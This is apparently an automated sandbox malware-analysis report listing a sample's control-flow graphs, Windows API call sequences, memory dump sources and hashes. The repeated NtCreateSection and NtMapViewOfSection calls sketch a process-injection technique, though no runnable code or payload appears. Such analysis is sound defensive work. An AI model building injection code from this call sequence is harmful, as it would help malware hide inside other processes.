                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b8708e0fd601c17419c4bee628408aeaf70cc106fe2e9d70b960fe5b7e9fb35e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DC02B7308020940C754CE701A0010CF2D09555208F31FD234005FF182D260F1C755C2
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:5.9%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:35.8%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:81
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:2

Control-flow Graph (first listed block: 401553-4015b2; legend: Executed, Not Executed)
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (first listed block: 40156b-4015b2; legend: Executed, Not Executed)
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (first listed block: 401561-4015b2; legend: Executed, Not Executed)
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 224 40156f-4015b2 call 4011cd 232 4015b4 224->232 233 4015b7-4015bc 224->233 232->233 235 4015c2-4015d3 233->235 236 4018df-4018e7 233->236 240 4015d9-401602 235->240 241 4018dd 235->241 236->233 239 4018ec-40193b call 4011cd 236->239 240->241 248 401608-40161f NtDuplicateObject 240->248 241->239 248->241 250 401625-401649 NtCreateSection 248->250 252 4016a5-4016cb NtCreateSection 250->252 253 40164b-40166c NtMapViewOfSection 250->253 252->241 257 4016d1-4016d5 252->257 253->252 256 40166e-40168a NtMapViewOfSection 253->256 256->252 259 40168c-4016a2 256->259 257->241 260 4016db-4016fc NtMapViewOfSection 257->260 259->252 260->241 262 401702-40171e NtMapViewOfSection 260->262 262->241 265 401724 262->265 265->241 266 401724 call 401729 265->266 266->241
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 267 401583-4015b2 call 4011cd 276 4015b4 267->276 277 4015b7-4015bc 267->277 276->277 279 4015c2-4015d3 277->279 280 4018df-4018e7 277->280 284 4015d9-401602 279->284 285 4018dd 279->285 280->277 283 4018ec-40193b call 4011cd 280->283 284->285 292 401608-40161f NtDuplicateObject 284->292 285->283 292->285 294 401625-401649 NtCreateSection 292->294 296 4016a5-4016cb NtCreateSection 294->296 297 40164b-40166c NtMapViewOfSection 294->297 296->285 301 4016d1-4016d5 296->301 297->296 300 40166e-40168a NtMapViewOfSection 297->300 300->296 303 40168c-4016a2 300->303 301->285 304 4016db-4016fc NtMapViewOfSection 301->304 303->296 304->285 306 401702-40171e NtMapViewOfSection 304->306 306->285 309 401724 306->309 309->285 310 401724 call 401729 309->310 310->285
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 311 401587-4015b2 call 4011cd 315 4015b4 311->315 316 4015b7-4015bc 311->316 315->316 318 4015c2-4015d3 316->318 319 4018df-4018e7 316->319 323 4015d9-401602 318->323 324 4018dd 318->324 319->316 322 4018ec-40193b call 4011cd 319->322 323->324 331 401608-40161f NtDuplicateObject 323->331 324->322 331->324 333 401625-401649 NtCreateSection 331->333 335 4016a5-4016cb NtCreateSection 333->335 336 40164b-40166c NtMapViewOfSection 333->336 335->324 340 4016d1-4016d5 335->340 336->335 339 40166e-40168a NtMapViewOfSection 336->339 339->335 342 40168c-4016a2 339->342 340->324 343 4016db-4016fc NtMapViewOfSection 340->343 342->335 343->324 345 401702-40171e NtMapViewOfSection 343->345 345->324 348 401724 345->348 348->324 349 401724 call 401729 348->349 349->324
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 33071139-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004C024D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4c0000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005EF140
                                                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 005EF160
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005E8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5e8000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b51d0d94c68f448d2ed4fde180785e21b5e9567c86424d9fbc7cf34ad79b2fe2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF0C231600358ABD7283ABAE88DA6E7AE8BF49724F100278E682910C0CB70E8058760
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 426 4c0e0f-4c0e24 SetErrorMode * 2 427 4c0e2b-4c0e2c 426->427 428 4c0e26 426->428 428->427
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,004C0223,?,?), ref: 004C0E19
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,004C0223,?,?), ref: 004C0E1E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4c0000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 37266e850fa7461fd680b01f9627d0ca78227899bd460c9d1794fc9cdfc8cad4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24D01235145128B7D7403A94DC09BDE7B1CDF05B62F008411FB0DD9180C774994046E9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 429 40193e-401947 430 40195e 429->430 431 40194f-40195a 429->431 430->431 432 401961-4019ae call 4011cd Sleep call 401452 430->432 431->432 443 4019b0-4019b8 call 401553 432->443 444 4019bd-401a03 call 4011cd 432->444 443->444
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 458 40194a-4019ae call 4011cd Sleep call 401452 471 4019b0-4019b8 call 401553 458->471 472 4019bd-401a03 call 4011cd 458->472 471->472
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
